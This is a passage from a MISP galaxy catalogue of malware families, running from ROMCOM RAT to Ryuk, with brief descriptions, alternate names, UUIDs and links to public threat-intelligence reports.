Unit 42 observed threat actor Tropical Scorpius using this RAT in operations where also Cuba ransomware was deployed.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ROMCOM RAT.
Known Synonyms |
---|
PEAPOD |
SingleCamper |
SnipBot |
Internal MISP references
UUID 5f1c11d3-c6ac-4368-a801-cced88a9d93b
which can be used as unique global reference for ROMCOM RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat - webarchive
- https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/ - webarchive
- https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/ - webarchive
- https://cert.gov.ua/article/3349703 - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/ - webarchive
- https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass - webarchive
- https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/ - webarchive
- https://blog.talosintelligence.com/uat-5647-romcom/ - webarchive
- https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html - webarchive
- https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries - webarchive
- https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/ - webarchive
- https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Romeo(Alfa,Bravo, ...)
Internal MISP references
UUID 87a45a07-30d7-4223-ae61-6b1e6dde0f5a
which can be used as unique global reference for Romeo(Alfa,Bravo, ...)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rook
According to PCrisk, Rook is ransomware (an updated variant of Babuk) that prevents victims from accessing/opening files by encrypting them. It also modifies filenames and creates a text file/ransom note ("HowToRestoreYourFiles.txt"). Rook renames files by appending the ".Rook" extension. For example, it renames "1.jpg" to "1.jpg.Rook", "2.jpg" to "2.jpg.Rook".
Internal MISP references
UUID 5df87e9b-4fd1-4f48-92d7-416b7d83313f
which can be used as unique global reference for Rook
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rook - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/ - webarchive
- https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/ - webarchive
- https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md - webarchive
- https://seguranca-informatica.pt/rook-ransomware-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Roopirs
Internal MISP references
UUID b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9
which can be used as unique global reference for Roopirs
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Roopy
Internal MISP references
UUID 68050d50-eece-43ba-8668-0825eab940f0
which can be used as unique global reference for Roopy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rorschach Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rorschach Ransomware.
Known Synonyms |
---|
BabLock |
Internal MISP references
UUID 86c3434c-ca86-4109-b0fc-61d14d59505c
which can be used as unique global reference for Rorschach Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach - webarchive
- https://www.group-ib.com/blog/bablock-ransomware/ - webarchive
- https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/ - webarchive
- https://medium.com/@simone.kraus/rorschach-ransomware-analysis-with-attack-flow-7fa5ff613a75 - webarchive
- https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/d/an-analysis-of-the-bablock-ransomware-/iocs-an-analysis-of-the-babLock-ransomware.txt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Roseam
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Roseam.
Known Synonyms |
---|
PisLoader |
Internal MISP references
UUID 8a4eb0ca-7175-4e69-b8d2-fd7a724de67b
which can be used as unique global reference for Roseam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Roshtyak
A DLL backdoor distributed by Raspberry Robin. According to Avast Decoded, Roshtyak is one of the best-protected malware strains they have ever seen.
Internal MISP references
UUID 398316b7-3ccd-445e-ab10-4428f165649f
which can be used as unique global reference for Roshtyak
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.roshtyak - webarchive
- https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://unit42.paloaltonetworks.com/unsigned-dlls/ - webarchive
- https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RotorCrypt
Ransomware that was discovered in the last months of 2016 and is likely based on Gomasom, another ransomware family.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RotorCrypt.
Known Synonyms |
---|
RotoCrypt |
Rotor |
Internal MISP references
UUID f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966
which can be used as unique global reference for RotorCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rover
Internal MISP references
UUID 53e94bc9-c8d2-4fb6-9c02-00841e454050
which can be used as unique global reference for Rover
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rovnix
Rovnix is a bootkit that consists of a driver loader (in the VBR) and the drivers (32-bit, 64-bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rovnix.
Known Synonyms |
---|
BkLoader |
Cidox |
Mayachok |
Internal MISP references
UUID 8d984309-b7fa-4ccf-a6b7-da17283aae2f
which can be used as unique global reference for Rovnix
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix - webarchive
- https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/ - webarchive
- https://securelist.com/oh-what-a-boot-iful-mornin/97365 - webarchive
- https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf - webarchive
- http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981 - webarchive
- http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html - webarchive
- https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/ - webarchive
- http://www.malwaretech.com/2014/05/rovnix-new-evolution.html - webarchive
- https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/ - webarchive
- https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RoyalCli
RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker's command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.
Internal MISP references
UUID 92d87656-5e5b-410c-bdb6-bf028324dc72
which can be used as unique global reference for RoyalCli
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://github.com/nccgroup/Royal_APT - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Royal DNS
RoyalDNS is a DNS-based backdoor used by APT15 that persists on a system through a service called 'Nwsapagent'.
Internal MISP references
UUID 8611f656-b0d8-4d16-93f0-c699f2af9b7a
which can be used as unique global reference for Royal DNS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://github.com/nccgroup/Royal_APT - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Royal Ransom (Windows)
Ransomware
Internal MISP references
UUID df1baad8-e4b6-4507-964c-6e9a8dd5252c
which can be used as unique global reference for Royal Ransom (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a - webarchive
- https://arcticwolf.com/resources/blog/follow-on-extortion-campaign-targeting-victims-of-akira-and-royal-ransomware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware - webarchive
- https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65 - webarchive
- https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/ - webarchive
- https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal - webarchive
- https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/ - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html - webarchive
- https://www.cybereason.com/blog/royal-ransomware-analysis - webarchive
- https://socradar.io/dark-web-profile-royal-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/ - webarchive
- https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://unit42.paloaltonetworks.com/royal-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html - webarchive
- https://www.coalitioninc.com/blog/active-exploitation-firewalls - webarchive
- https://securityscorecard.pathfactory.com/research/the-royal-ransomware - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive - webarchive
- https://www.bridewell.com/insights/news/detail/hunting-for-ursnif - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rozena
Internal MISP references
UUID cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766
which can be used as unique global reference for Rozena
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena - webarchive
- https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor - webarchive
- https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/ - webarchive
- https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors - webarchive
- https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RTM
RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RTM.
Known Synonyms |
---|
Redaman |
Internal MISP references
UUID e6952b4d-e96d-4641-a88f-60074776d553
which can be used as unique global reference for RTM
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm - webarchive
- https://jonahacks.medium.com/malware-analysis-manual-unpacking-of-redaman-ec1782352cfb - webarchive
- https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/ - webarchive
- https://www.youtube.com/watch?v=YXnNO3TipvM - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RTM Locker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RTM Locker.
Known Synonyms |
---|
Read The Manual Locker |
Internal MISP references
UUID b299d033-7772-44a6-a8e0-6b8c5f8af5c6
which can be used as unique global reference for RTM Locker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker - webarchive
- https://www.quorumcyber.com/threat-intelligence/rtm-locker-ransomware-targets-vmware-esxi-servers/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/read-the-manual-locker-a-private-raas-provider.html - webarchive
- https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
rtpos
Internal MISP references
UUID 89ee2cb0-2c72-4a25-825b-bb56083fdd9b
which can be used as unique global reference for rtpos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ruckguv
Internal MISP references
UUID b88b50c0-3db9-4b8f-8564-4f56f991bee2
which can be used as unique global reference for Ruckguv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rumish
Internal MISP references
UUID e1564cfe-ab82-4c14-8f92-65af0d760d70
which can be used as unique global reference for Rumish
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Running RAT
NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-debugging techniques.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Running RAT.
Known Synonyms |
---|
running_rat |
Internal MISP references
UUID b746a645-5974-44db-a811-a024214b7fba
which can be used as unique global reference for Running RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/ - webarchive
- https://hunt.io/blog/runningrat-from-remote-access-to-crypto-mining - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RURansom
RURansom shows characteristics of typical ransomware, but despite its name, Trend Micro's analysis indicates that this malware is more a wiper than ransomware, because of the irreversible destruction of the encrypted files.
Internal MISP references
UUID bdcfb449-e897-4c44-a429-7665cce194fe
which can be used as unique global reference for RURansom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ruransom - webarchive
- https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html - webarchive
- https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html - webarchive
- https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rurktar
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rurktar.
Known Synonyms |
---|
RCSU |
Internal MISP references
UUID 512e0b13-a52b-45ef-9230-7172f5e976d4
which can be used as unique global reference for Rurktar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RustBucket (Windows)
Internal MISP references
UUID 832680ff-8b29-492e-8523-62510eb5d021
which can be used as unique global reference for RustBucket (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rustock
Internal MISP references
UUID 76e98e04-0ab7-4000-80ee-7bcbcf9c110d
which can be used as unique global reference for Rustock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock - webarchive
- http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf - webarchive
- https://www.secureworks.com/blog/research-21041 - webarchive
- http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf - webarchive
- http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html - webarchive
- http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/ - webarchive
- https://darknetdiaries.com/episode/110/ - webarchive
- https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html - webarchive
- http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ryuk
Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It has been observed being used to attack companies or professional environments. Cybersecurity experts found that Ryuk and Hermes ransomware share pieces of code. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors.
Internal MISP references
UUID 62c79940-184e-4b8d-9237-35434bb79678
which can be used as unique global reference for Ryuk
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk - webarchive
- https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html - webarchive
- https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider - webarchive
- https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/ - webarchive
- https://twitter.com/ffforward/status/1324281530026524672 - webarchive
- https://www.youtube.com/watch?v=HwfRxjV2wok - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption - webarchive
- https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware - webarchive
- https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://twitter.com/SophosLabs/status/1321844306970251265 - webarchive
- https://0xchina.medium.com/malware-reverse-engineering-31039450af27 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://twitter.com/Prosegur/status/1199732264386596864 - webarchive
- https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/ - webarchive
- https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://twitter.com/SecurityJoes/status/1402603695578157057 - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf - webarchive
- https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/ - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/ - webarchive
- https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
- https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/ - webarchive
- https://twitter.com/anthomsec/status/1321865315513520128 - webarchive
- https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456 - webarchive
- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/ - webarchive
- https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects - webarchive
- https://github.com/scythe-io/community-threats/tree/master/Ryuk - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/ - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/ - webarchive
- https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html - webarchive
- https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/ - webarchive
- https://thehackernews.com/2022/05/malware-analysis-trickbot.html - webarchive
- https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf - webarchive
- https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP - webarchive
- https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more - webarchive
- https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker - webarchive
- https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/ - webarchive
- https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/ - webarchive
- https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/ - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/ - webarchive
- https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html - webarchive
- https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://blog.reversinglabs.com/blog/hunting-for-ransomware - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/ - webarchive
- https://www.hhs.gov/sites/default/files/bazarloader.pdf - webarchive
- https://www.youtube.com/watch?v=7xxRunBP5XA - webarchive
